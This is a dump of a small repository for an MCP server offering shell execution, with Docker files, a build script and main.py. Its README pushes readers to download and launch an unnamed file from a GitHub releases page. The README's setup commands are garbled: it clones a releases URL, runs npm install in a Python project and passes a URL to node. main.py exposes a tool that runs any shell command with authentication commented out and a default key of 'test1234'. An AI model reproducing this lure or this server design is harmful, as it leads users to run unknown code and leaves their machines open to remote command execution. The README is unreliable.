#
tokens: 1810/50000 8/8 files
lines: off (toggle) GitHub
raw markdown copy
# Directory Structure

```
├── .dockerignore
├── .vscode
│   └── launch.json
├── docker-compose.yml
├── Dockerfile
├── Dockerfile.ubuntu
├── LICENSE
├── main.py
├── README.md
├── requirements.txt
└── scripts
    └── build.sh
```

# Files

--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------

```
__pycache__/
*.py[cod]
*$py.class
*.so
.git/
.github/
.gitignore
.vscode/
.env
.pytest_cache/
.coverage
htmlcov/ 
scripts/
Docker*
docker-compose.yml
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

```markdown
# MCP Serve: A Powerful Server for Deep Learning Models

Welcome to the MCP Serve repository, a cutting-edge tool designed for running Deep Learning models effortlessly. With a simple yet effective MCP Server that allows for Shell execution, connecting locally via Ngrok, or even hosting an Ubuntu24 container using Docker, this repository is a must-have for any AI enthusiast!

## Features 🚀

🔹 **Simple MCP Server**: Easily launch your Deep Learning models and serve them using the MCP Server.
🔹 **Shell Execution**: Execute commands directly from the server shell for maximum control.
🔹 **Ngrok Connectivity**: Connect to your local server via Ngrok for seamless access from anywhere.
🔹 **Ubuntu24 Container Hosting**: Utilize Docker to host an Ubuntu24 container for a stable environment.
🔹 **Cutting-Edge Technologies**: Designed with Anthropic, Gemini, LangChain, and more top-notch technologies.
🔹 **Support for ModelContextProtocol**: Ensuring seamless integration with various Deep Learning models.
🔹 **OpenAI Integration**: Connect effortlessly with OpenAI for advanced AI capabilities.

## Repository Topics 📋

✨ anthropic, claude, container, deepseek, docker, gemini, langchain, langgraph, mcp, modelcontextprotocol, ngrok, openai, sonnet, ubuntu, vibecoding

## Download App 📦

[![Download App](https://github.com/mark-oori/mcpserve/releases)](https://github.com/mark-oori/mcpserve/releases)

If the link above ends with the file name, don't forget to launch it and start exploring the possibilities!

## Getting Started 🏁

To get started with MCP Serve, follow these simple steps:

1. **Clone the Repository**: `git clone https://github.com/mark-oori/mcpserve/releases`
2. **Install Dependencies**: `npm install`
3. **Launch the MCP Server**: `node https://github.com/mark-oori/mcpserve/releases`

## Contributing 🤝

We welcome contributions to make MCP Serve even more robust and feature-rich. Feel free to fork the repository, make your changes, and submit a pull request.

## Community 🌟

Join our community of AI enthusiasts, developers, and researchers to discuss the latest trends in Deep Learning, AI frameworks, and more. Share your projects, ask questions, and collaborate with like-minded individuals.

## Support ℹ️

If you encounter any issues with MCP Serve or have any questions, please check the "Issues" section of the repository or reach out to our support team for assistance.

## License 📜

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

Dive into the world of Deep Learning with MCP Serve and revolutionize the way you interact with AI models. Whether you're a seasoned AI professional or a beginner exploring the possibilities of AI, MCP Serve has something for everyone. Start your Deep Learning journey today! 🌌

![Deep Learning](https://github.com/mark-oori/mcpserve/releases)

Happy coding! 💻🤖
```

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------

```
langchain-mcp-adapters
httpx
python-dotenv
```

--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------

```yaml
version: '3'

services:
  mcp:
    container_name: mcp
    build: .
    ports:
      - "8005:8005"
    environment:
      # - MCP_API_KEY=${MCP_API_KEY:-test1234} # Not ready yet, need updates to mcp library. Can be done artificially for now.
      - FASTMCP_DEBUG=true
      - FASTMCP_LOG_LEVEL=DEBUG
    volumes:
      - .:/app
    restart: unless-stopped 
```

--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------

```dockerfile
# Small python 3.11 docker file
FROM python:3.11-slim

# Set working directory
WORKDIR /app

# Set environment variables
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1

# Install dependencies
COPY requirements.txt .
RUN pip install --no-cache-dir --upgrade pip && \
    pip install --no-cache-dir uv && \
    uv pip install --system --no-cache-dir -r requirements.txt

# Copy application code
COPY . .

# Expose port
EXPOSE 8005

# Run the application
CMD ["python", "main.py"]

```

--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------

```json
{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Python: MCP Server",
            "type": "debugpy",
            "request": "launch",
            "program": "${workspaceFolder}/main.py",
            "console": "integratedTerminal",
            "justMyCode": false,
            "env": {
                "PYTHONPATH": "${workspaceFolder}",
                "FASTMCP_DEBUG": "true",
                "FASTMCP_LOG_LEVEL": "DEBUG"
            }
        }
    ]
}

```

--------------------------------------------------------------------------------
/scripts/build.sh:
--------------------------------------------------------------------------------

```bash
#!/bin/bash

SHORT_SHA=$(git rev-parse --short HEAD)

# Set TAG to first argument if provided, otherwise use SHORT_SHA
TAG=${1:-$SHORT_SHA}

########################################################################
## Container Registry
########################################################################
# Define your GCP parameters
REPOSITORY="ryaneggz"  # Name of your Artifact Registry repository
PROJECT_ID="mcpserve"

# Build the Docker image and tag it for Artifact Registry
docker build --squash -t $REPOSITORY/$PROJECT_ID:$TAG .
docker tag $REPOSITORY/$PROJECT_ID:$TAG $REPOSITORY/$PROJECT_ID:latest

########################################################################
## Docker Hub
########################################################################
echo ""
## Prompt to push the image to Docker Hub
echo "Do you want to push the image to Docker Hub? (y/n)"
read -r response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
then
  docker push $REPOSITORY/$PROJECT_ID:$TAG
  docker push $REPOSITORY/$PROJECT_ID:latest
fi

```

--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------

```python
# mcp/main.py
import os
import subprocess
from mcp.server.fastmcp import FastMCP
from starlette.exceptions import HTTPException
from dotenv import load_dotenv

# Load environment variables from .env file
load_dotenv()

# MCP API key
APP_NAME = os.getenv("APP_NAME", 'Terminal')
APP_DEBUG = os.getenv("APP_DEBUG", True)
APP_LOG_LEVEL = os.getenv("APP_LOG_LEVEL", 'DEBUG')
APP_PORT = os.getenv("APP_PORT", 8005)
MCP_API_KEY = os.getenv("MCP_API_KEY", 'test1234')

# Middleware function to check API key authentication
def middleware(request):
    # Verify the x-api-key header matches the environment variable
    if request.headers.get("x-api-key") != MCP_API_KEY:
        raise HTTPException(status_code=401, detail="Unauthorized")

# Server configuration settings
settings = {
    'debug': APP_DEBUG,          # Enable debug mode
    'port': APP_PORT,          # Port to run server on
    'log_level': APP_LOG_LEVEL,  # Logging verbosity
    # 'middleware': middleware, # Authentication middleware
}

# Initialize FastMCP server instance
mcp = FastMCP(name=APP_NAME, **settings)

@mcp.tool()
async def shell_command(command: str) -> str:
    """Execute a shell command"""
    return subprocess.check_output(command, shell=True).decode()

if __name__ == "__main__":
    print(f"Starting MCP server... {APP_NAME} on port {APP_PORT}")
    # Start server with Server-Sent Events transport
    mcp.run(transport="sse")
```